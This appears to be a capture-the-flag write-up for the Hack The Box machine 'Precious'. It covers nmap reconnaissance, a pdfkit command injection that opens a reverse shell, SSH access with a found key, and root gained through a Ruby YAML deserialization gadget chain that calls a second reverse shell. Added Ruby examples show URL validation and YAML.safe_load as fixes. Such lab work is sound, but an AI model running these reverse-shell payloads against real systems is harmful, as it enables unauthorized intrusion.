
HTB Precious (target machine)

Time: 2023-04-03 16:35:09

IP and port probing

nmap 10.10.11.189 -A -sV -sS -O -v
Nmap scan report for 10.10.11.189
Host is up (0.35s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 845e13a8e31e20661d235550f63047d2 (RSA)
|   256 a2ef7b9665ce4161c467ee4e96c7c892 (ECDSA)
|_  256 33053dcd7ab798458239e7ae3c91a658 (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-server-header: nginx/1.18.0
| http-methods: 
|_  Supported Methods: HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://precious.htb/
Aggressive OS guesses: Linux 5.0 (97%), Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 42.905 days (since Sat Feb 18 23:50:05 2023)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 1720/tcp)
HOP RTT       ADDRESS
1   354.62 ms 10.10.14.1
2   354.88 ms 10.10.11.189

NSE: Script Post-scanning.
Initiating NSE at 22:33
Completed NSE at 22:33, 0.00s elapsed
Initiating NSE at 22:33
Completed NSE at 22:33, 0.00s elapsed
Initiating NSE at 22:33
Completed NSE at 22:33, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.17 seconds
           Raw packets sent: 1263 (57.200KB) | Rcvd: 1163 (47.940KB)

Map the domain name precious.htb to the target IP.

The web app is a PDF printing service; try for command execution.

The popup is blank, so download the PDF and take a look.

Check the PDF properties and search for a pdfkit vulnerability.

Listen on port 6666 on Kali.

Execute on the web side: http://10.10.14.10:8000/?name=#{'%20`bash -c "bash -i >& /dev/tcp/10.10.14.10/6666 0>&1"`'}

The reverse shell executes successfully.
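The command injection above works because the PDF service hands a user-supplied URL to a shell, so the backticks in the value are interpreted as a command substitution. As an added example that is not part of the original post and does not reproduce pdfkit's own code, the Ruby below puts the general shape of that flaw next to a hardened form: an allow-list check on the URL followed by an argv-style invocation that never involves a shell. The sample URLs, the wkhtmltopdf argument layout and the function names are assumptions made for this illustration.

```ruby
require 'uri'

# Constructed sample inputs (not taken from the target): an ordinary document
# URL and the shell-metacharacter form used in the walkthrough, here with a
# harmless command in place of the reverse shell.
NORMAL_URL  = "http://example.com/report?id=42&page=1"
TAINTED_URL = %q|http://10.10.14.10:8000/?name=#{'%20`bash -c "id"`'}|

# Characters that are never valid unescaped in a URL and that also carry
# meaning for sh: whitespace, backtick, braces, angle brackets, quotes,
# backslash, pipe and caret. Legitimate query separators (& = ?) stay allowed.
INVALID_URL_CHARS = /[\s`{}<>"\\|^]/

# Allow-list check: the value must be free of the characters above and must
# parse as an absolute http(s) URL with a host. URI.parse independently
# rejects spaces and braces, so the regex is a second, separate guard.
def safe_pdf_url?(raw)
  return false if raw.match?(INVALID_URL_CHARS)
  uri = URI.parse(raw)
  uri.is_a?(URI::HTTP) && !uri.host.to_s.empty?   # URI::HTTPS < URI::HTTP
rescue URI::InvalidURIError
  false
end

# Shape of the flaw: the attacker-controlled URL is spliced into one command
# string that a shell will interpret, so backticks and $( ) inside it run.
# (Illustrative pattern only; pdfkit's exact code is not reproduced here.)
def vulnerable_command(url)
  "wkhtmltopdf \"#{url}\" out.pdf"
end

# Hardened shape: validate first, then pass the URL to the renderer as its own
# argv element. Kernel#system / Process.spawn with an argument list does not
# start a shell, so the URL is one literal argument whatever it contains.
def hardened_argv(url)
  raise ArgumentError, "rejected URL: #{url.inspect}" unless safe_pdf_url?(url)
  ["wkhtmltopdf", url, "out.pdf"]
end

if __FILE__ == $PROGRAM_NAME
  [NORMAL_URL, TAINTED_URL].each do |u|
    puts "#{safe_pdf_url?(u) ? 'accept' : 'reject'}  #{u}"
  end
  puts vulnerable_command(TAINTED_URL)   # the backticks reach a shell string
  p hardened_argv(NORMAL_URL)            # the URL is a single argv element
end
```

The validator is deliberately narrow: a PDF-from-URL service only ever needs http or https sources, so anything else is rejected before a renderer is spawned, and the argv form means a missed character in the allow-list still cannot reach a shell.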

We are the ruby user; looking at the home directory reveals another user, henry.

Rummage through the ruby folder.

A key is found in .bundle.

Use the key to connect over SSH.

The flag is found in the current directory.

Escalate privileges from the current user: sudo -l reveals ruby and update_dependencies.rb.

View the rb file.

Google search: dependencies exploit.

Reference link: https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/

Listen on port 7777 on Kali to receive the shell.

cd to /tmp, write the script, grant execute permission and run it.

---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: "bash -c 'sh -i >& /dev/tcp/10.10.14.10/7777 0>&1'"
         method_id: :resolve

Escalated to root; get the flag from the root directory.
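The YAML document above works because the script loads it with a deserializer that honours !ruby/object tags, which is the class of flaw the reference post describes. As an added example, not the box's update_dependencies.rb and not code from the reference post, the Ruby below reads a dependency list with YAML.safe_load, which refuses tagged objects outright, and then validates the shape of what it parsed. The dependency-file format, the gem names and versions are constructed for this illustration.

```ruby
require 'yaml'

# Constructed sample: the kind of name => version map a maintenance script
# might read. The format is assumed; the box's real file is not reproduced.
BENIGN_YAML = <<~EOS
  somegem: "1.0.0"
  othergem: "2.3.4"
EOS

# Constructed sample: a document carrying a Ruby object tag, the construct
# that an unsafe loader turns into arbitrary object instantiation.
TAGGED_YAML = <<~EOS
  ---
  - !ruby/object:Gem::Installer
    i: x
EOS

# Loads a dependency map with the safe loader only. Psych's safe_load permits
# just the basic types (strings, numbers, booleans, arrays, hashes, nil) and
# raises Psych::DisallowedClass on any !ruby/object tag. On Ruby < 3.1
# (Psych < 4) YAML.load would instead instantiate the tagged class; on 3.1+
# YAML.load is already the safe loader and the unsafe one is YAML.unsafe_load.
def load_dependencies(text)
  data = YAML.safe_load(text)
  raise ArgumentError, "expected a name => version map" unless data.is_a?(Hash)
  data.each do |name, version|
    unless name.is_a?(String) && version.is_a?(String) && version.match?(/\A\d+(\.\d+)*\z/)
      raise ArgumentError, "bad entry #{name.inspect} => #{version.inspect}"
    end
  end
  data
end

# Reduces the outcome to a label suitable for logging or alerting:
# :ok, :rejected_tag (object tag present) or :rejected_shape (wrong structure).
def classify(text)
  load_dependencies(text)
  :ok
rescue Psych::DisallowedClass
  :rejected_tag
rescue ArgumentError, Psych::SyntaxError
  :rejected_shape
end

if __FILE__ == $PROGRAM_NAME
  puts "benign: #{classify(BENIGN_YAML)}"   # benign: ok
  puts "tagged: #{classify(TAGGED_YAML)}"   # tagged: rejected_tag
end
```

The point of the second check is that safe_load alone only guarantees plain data; a script that then passes values on to gem or shell commands still needs each value constrained to the shape it expects, and a rejection of either kind is worth logging because a tagged document in a file that should only ever hold versions is itself a signal.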

From: https://www.cnblogs.com/huan-xin/p/17283385.html
